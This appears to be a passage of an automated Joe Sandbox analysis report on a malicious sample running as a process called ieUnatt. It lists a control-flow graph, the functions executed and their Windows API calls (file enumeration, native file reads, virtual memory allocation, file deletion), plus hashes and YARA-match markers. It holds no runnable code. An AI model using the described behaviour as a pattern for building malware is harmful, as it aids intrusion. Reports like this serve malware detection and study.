2f88e1f 96644->96627 96647 2f88f0b 96646->96647 96648 2f88f57 96646->96648 96647->96629 96654 50b2fb0 LdrInitializeThunk 96648->96654 96649 2f88f7c 96649->96629 96651->96615 96652->96638 96653->96644 96654->96649 96655 2f8cc40 96656 2f8bb40 RtlFreeHeap 96655->96656 96657 2f8cc55 96656->96657 96658 2f82180 96662 2f82199 96658->96662 96659 2f82226 96660 2f821e1 96661 2f8bb40 RtlFreeHeap 96660->96661 96663 2f821ee 96661->96663 96662->96659 96662->96660 96664 2f82221 96662->96664 96665 2f8bb40 RtlFreeHeap 96664->96665 96665->96659 96667 2f7148b 96668 2f71493 PostThreadMessageW 96667->96668 96669 2f7149f 96667->96669 96668->96669

                                                                      Executed Functions

                                                                      Function 02F69F60 Relevance: 24.2, Strings: 19, Instructions: 448COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 165 2f69f60-2f6a281 166 2f6a288-2f6a28f 165->166 167 2f6a2b4-2f6a2cd 166->167 168 2f6a291-2f6a2a7 166->168 167->167 171 2f6a2cf-2f6a2e0 167->171 169 2f6a2b2 168->169 170 2f6a2a9-2f6a2af 168->170 169->166 170->169 172 2f6a2f1-2f6a2fd 171->172 173 2f6a30e-2f6a315 172->173 174 2f6a2ff-2f6a30c 172->174 175 2f6a336-2f6a340 173->175 176 2f6a317-2f6a334 173->176 174->172 178 2f6a351-2f6a35a 175->178 176->173 179 2f6a35c-2f6a368 178->179 180 2f6a378-2f6a389 178->180 181 2f6a376 179->181 182 2f6a36a-2f6a370 179->182 183 2f6a39a-2f6a3a3 180->183 181->178 182->181 185 2f6a3c7-2f6a3d1 183->185 186 2f6a3a5-2f6a3b1 183->186 187 2f6a3d3-2f6a3ee 185->187 188 2f6a409-2f6a412 185->188 189 2f6a3b3-2f6a3b7 186->189 190 2f6a3b8-2f6a3ba 186->190 191 2f6a3f5-2f6a3f7 187->191 192 2f6a3f0-2f6a3f4 187->192 193 2f6a437 188->193 194 2f6a414-2f6a435 188->194 189->190 195 2f6a3c5 190->195 196 2f6a3bc-2f6a3c2 190->196 197 2f6a407 191->197 198 2f6a3f9-2f6a401 191->198 192->191 199 2f6a43e-2f6a457 193->199 194->188 195->183 196->195 197->185 198->197 199->199 201 2f6a459-2f6a463 199->201 202 2f6a474-2f6a47d 201->202 203 2f6a494-2f6a49b 202->203 204 2f6a47f-2f6a492 202->204 206 2f6a4cd-2f6a4d7 203->206 207 2f6a49d-2f6a4cb 203->207 204->202 208 2f6a4e8-2f6a4f1 206->208 207->203 209 2f6a502-2f6a51b 208->209 210 2f6a4f3-2f6a500 208->210 209->209 212 2f6a51d-2f6a529 209->212 210->208 213 2f6a52b-2f6a546 212->213 214 2f6a548-2f6a551 212->214 213->212 215 2f6a557-2f6a55e 214->215 216 2f6a6e1-2f6a6eb 214->216 218 2f6a560-2f6a572 215->218 219 2f6a588-2f6a592 215->219 217 2f6a6fc-2f6a708 216->217 220 2f6a71e-2f6a725 217->220 221 2f6a70a-2f6a71c 217->221 222 2f6a574-2f6a578 218->222 223 2f6a579-2f6a57b 218->223 224 2f6a5a3-2f6a5ac 219->224 227 2f6a72b-2f6a732 220->227 228 2f6a809-2f6a813 220->228 221->217 222->223 230 2f6a586 223->230 231 2f6a57d-2f6a583 223->231 225 2f6a5c3-2f6a5c6 224->225 226 2f6a5ae-2f6a5c1 224->226 233 2f6a5cc-2f6a5d3 225->233 226->224 234 2f6a764 call 2f8b7b0 227->234 235 2f6a734-2f6a762 227->235 230->215 231->230 236 2f6a605-2f6a614 233->236 237 2f6a5d5-2f6a603 233->237 241 2f6a769-2f6a773 234->241 235->227 239 2f6a616 236->239 240 2f6a61b-2f6a622 236->240 237->233 239->216 242 2f6a647-2f6a651 240->242 243 2f6a624-2f6a63a 240->243 244 2f6a784-2f6a78d 241->244 249 2f6a662-2f6a66b 242->249 247 2f6a645 243->247 248 2f6a63c-2f6a642 243->248 245 2f6a7a0-2f6a7a7 244->245 246 2f6a78f-2f6a79e 244->246 251 2f6a7d4-2f6a7de 245->251 252 2f6a7a9-2f6a7d2 245->252 246->244 247->240 248->247 253 2f6a681-2f6a68a 249->253 254 2f6a66d-2f6a67f 249->254 255 2f6a7ef-2f6a7f9 251->255 252->245 256 2f6a6a6-2f6a6ac 253->256 257 2f6a68c-2f6a6a4 253->257 254->249 255->228 260 2f6a7fb-2f6a807 255->260 259 2f6a6b0-2f6a6b4 256->259 257->253 261 2f6a6b6-2f6a6da 259->261 262 2f6a6dc 259->262 260->255 261->259 262->214
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                      • API String ID: 0-3217503214
                                                                      • Opcode ID: e84b1de85178849c5226fd967b2966ff36f4256e4bb59806103181765a7e37f8
                                                                      • Instruction ID: 008160bbba38df77e36209eef206972a0e667baa00ef17137c5a132ef73bc8b2
                                                                      • Opcode Fuzzy Hash: e84b1de85178849c5226fd967b2966ff36f4256e4bb59806103181765a7e37f8
                                                                      • Instruction Fuzzy Hash: 34329BB0905229CBEB64CF44CD98BEDBBB2FB44348F1481D9C1097B291DBB65A89CF54
                                                                      Function 02F7CC50 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F7CD34
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F7CD6F
                                                                      • FindClose.KERNELBASE(?), ref: 02F7CD7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                      • Instruction ID: 10bba55d0254c4b187ad18934599d2e4480c0cf74012e49fb4563639de175b8f
                                                                      • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                      • Instruction Fuzzy Hash: 70319471A003487BDB20EF64CC85FFF777D9F44784F14415ABA19A6190DB70AB848BA0
                                                                      Function 02F89810 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 02F89908
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction ID: a25292c215c2398164f683d6fa6a8bd80731b6e3bc504d8d7b371591fd78e893
                                                                      • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction Fuzzy Hash: C231E4B5A01248AFCB54DF98D880EEFB7B9EF88744F108109FA08A7340D770A851CFA0
                                                                      Function 02F89970 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 02F89A53
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction ID: b886d1b8713c22a0daa6c909d65493bf65b7fae62038bf855b4453721358f997
                                                                      • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction Fuzzy Hash: 1731D6B5A00248ABDB14DF98CC81EEFB7B9EF89754F108209FD18A7344D770A9518FA1
                                                                      Function 02F89C50 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(02F7240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,02F8860F,02F7240E,?,?,02F8BAEE), ref: 02F89D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                      • Instruction ID: 671efb1dba2c5e4492b4bdbbd6ef148cfa3b64b3e5f32e1a0db8ed3062b15537
                                                                      • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                      • Instruction Fuzzy Hash: A02119B5A00249ABDB10EF98CC41FAFB7B9EF89740F008109FE08A7344D674A9558FA1
                                                                      Function 02F89A60 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                      • Instruction ID: ec4b5a5f2bf5cb550f0d064a7363c9e771be399eaac6ad404211760a92fe8a5d
                                                                      • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                      • Instruction Fuzzy Hash: 4E11A031600649BBD720EBA8CC41FEFB7ADDF85744F004109FA08A7280DAB5B9458BA1
                                                                      Function 02F89B00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F89B34
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction ID: a242a03c857f8cbb7bdb74bc67342db0f6345e19148f93241a944ce86e396199
                                                                      • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction Fuzzy Hash: D2E046362012047BD620BA69CC40FEBB7ADDBC6B90F004419FB18A7242C6B1B9418AE1
                                                                      Function 050B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9901b62a4c8f23a4fe6cbd3c4c25ad28f78207ad854601a5bebcfdcbea174615
                                                                      • Instruction ID: 870a1c6c4101df194517dc5420602f3a029b6a1835bfae14029fc228692a6191
                                                                      • Opcode Fuzzy Hash: 9901b62a4c8f23a4fe6cbd3c4c25ad28f78207ad854601a5bebcfdcbea174615
                                                                      • Instruction Fuzzy Hash: 9C9002626015004251407259984440E64159BE23013D5C159A0554570C86198955926D
                                                                      Function 050B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3af4f28e40afe0e6b0e8265529213beb581084910c85b2d264ad7afa991fe548
                                                                      • Instruction ID: d99f9a7a001adf0d213164886ec700437919f822b1a6aced1e9ebc65d715739a
                                                                      • Opcode Fuzzy Hash: 3af4f28e40afe0e6b0e8265529213beb581084910c85b2d264ad7afa991fe548
                                                                      • Instruction Fuzzy Hash: A790023260580012A140725998C454E44159BE1301B95C055E0424564C8A158A565365
                                                                      Function 050B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a10d0976964caded7a774208bfda7f518630bd2af9329c782a8f7ed5da132a8a
                                                                      • Instruction ID: 910ae837ec53f952ba6a8af1959438b237f8218837780cd3e23d5e95c31ac77d
                                                                      • Opcode Fuzzy Hash: a10d0976964caded7a774208bfda7f518630bd2af9329c782a8f7ed5da132a8a
                                                                      • Instruction Fuzzy Hash: DC90022A21340002E1807259A44860E04158BD2202FD5D459A0015568CC91689695325
                                                                      Function 050B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5da27dab1a0e32abc19fe7cc69b9013de4e6f315c00f645cd4ace79892912e6e
                                                                      • Instruction ID: b8fc544fed4613d9968d41ddf6554868db8ecc8c6a836b5f2f30876ddd083971
                                                                      • Opcode Fuzzy Hash: 5da27dab1a0e32abc19fe7cc69b9013de4e6f315c00f645cd4ace79892912e6e
                                                                      • Instruction Fuzzy Hash: 7E90022230140003E1407259A45860E4415DBE2301F95D055E0414564CD91689565226
                                                                      Function 050B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fd69836bb988cc5c6de57b22c31e654c51a9fdceaa719b503f4bd3729a5cd9b8
                                                                      • Instruction ID: c1adc9413e0297eb0190f807603d2e62a8519314c849d0c52c3fc9618d8a56a0
                                                                      • Opcode Fuzzy Hash: fd69836bb988cc5c6de57b22c31e654c51a9fdceaa719b503f4bd3729a5cd9b8
                                                                      • Instruction Fuzzy Hash: CD900222242441526545B259944450F44169BE12417D5C056A1414960C85279956D625
                                                                      Function 050B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6de97141dea28b8f77364e695a8afd5aba96a6fc677a3cce05a9b68f96c8e6a3
                                                                      • Instruction ID: 556e7fd5e2ce0521db773ab8d99856d547a2c647f76b9fef5289e0d25740cebf
                                                                      • Opcode Fuzzy Hash: 6de97141dea28b8f77364e695a8afd5aba96a6fc677a3cce05a9b68f96c8e6a3
                                                                      • Instruction Fuzzy Hash: 8C90023220140413E1117259954470F04198BD1241FD5C456A0424568D96578A52A125
                                                                      Function 050B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ac9e9330c29530ddf80805fc344bc58215ebc8d3529421e7c1ccdc4e905c180
                                                                      • Instruction ID: 07e44a6e47e66199f19bd57541ee6c5a11d37317b5141eca7dec8d3ec37da35e
                                                                      • Opcode Fuzzy Hash: 6ac9e9330c29530ddf80805fc344bc58215ebc8d3529421e7c1ccdc4e905c180
                                                                      • Instruction Fuzzy Hash: 7E90023220140842E10072599444B4E04158BE1301F95C05AA0124664D8616C9517525
                                                                      Function 050B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ee98e8a8be4ad7114dc60c6c64c8022306e2931fb2316b3a8c652c3e26f61c1
                                                                      • Instruction ID: af0feb646712bea2b7cdec27be698524673ba3fe70e2dea06267b8f7954c0146
                                                                      • Opcode Fuzzy Hash: 6ee98e8a8be4ad7114dc60c6c64c8022306e2931fb2316b3a8c652c3e26f61c1
                                                                      • Instruction Fuzzy Hash: 6F90023220148802E1107259D44474E04158BD1301F99C455A4424668D869689917125
                                                                      Function 050B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cec71253d6955d6f34182083adad639af42c3ff09c0312460a7fd6a28c9c55d4
                                                                      • Instruction ID: 8a53d5f4304bbcd9af2f5f839dda35175d9ae26769e172b3cf88b4ac4ce0c72f
                                                                      • Opcode Fuzzy Hash: cec71253d6955d6f34182083adad639af42c3ff09c0312460a7fd6a28c9c55d4
                                                                      • Instruction Fuzzy Hash: 8590023220140402E1007699A44864E04158BE1301F95D055A5024565EC66689916135
                                                                      Function 050B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bb534fa73e73db29aa9bd81ee7c5221146c5c458bf81ef756dd4988a06dff6bb
                                                                      • Instruction ID: 5899992be7bafe8dab30ea1e9499f696097385c7d242ef3cb3b0276bc10b3a0c
                                                                      • Opcode Fuzzy Hash: bb534fa73e73db29aa9bd81ee7c5221146c5c458bf81ef756dd4988a06dff6bb
                                                                      • Instruction Fuzzy Hash: 6990026234140442E10072599454B0E0415CBE2301F95C059E1064564D861ACD52612A
                                                                      Function 050B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 69eabbfd20ac7448c4859db14bd70e0ab625556c3c5efc3cb05a831edf162156
                                                                      • Instruction ID: 28a2746c67e772a13c1cf6c32265591e1d61b85ecd3e622dcdd637e43e33b5ce
                                                                      • Opcode Fuzzy Hash: 69eabbfd20ac7448c4859db14bd70e0ab625556c3c5efc3cb05a831edf162156
                                                                      • Instruction Fuzzy Hash: 2B9002226014004251407269D88490E4415AFE2211795C165A0998560D855A89655669
                                                                      Function 050B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3fe5a76537a08d9c4d659fd7b14c579903c711dfcbe0ab75362aba27c0860c19
                                                                      • Instruction ID: 6cf0ab0f7f3e9cc6ef0a1c9a27cb39fd108d19adae8ef6b44434ee77ce4fd596
                                                                      • Opcode Fuzzy Hash: 3fe5a76537a08d9c4d659fd7b14c579903c711dfcbe0ab75362aba27c0860c19
                                                                      • Instruction Fuzzy Hash: FA900222211C0042E20076699C54B0F04158BD1303F95C159A0154564CC91689615525
                                                                      Function 050B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9494f4faf584a63aea2a10df2ea7dfc00e0a5689bebb088b96280dda424d2d8c
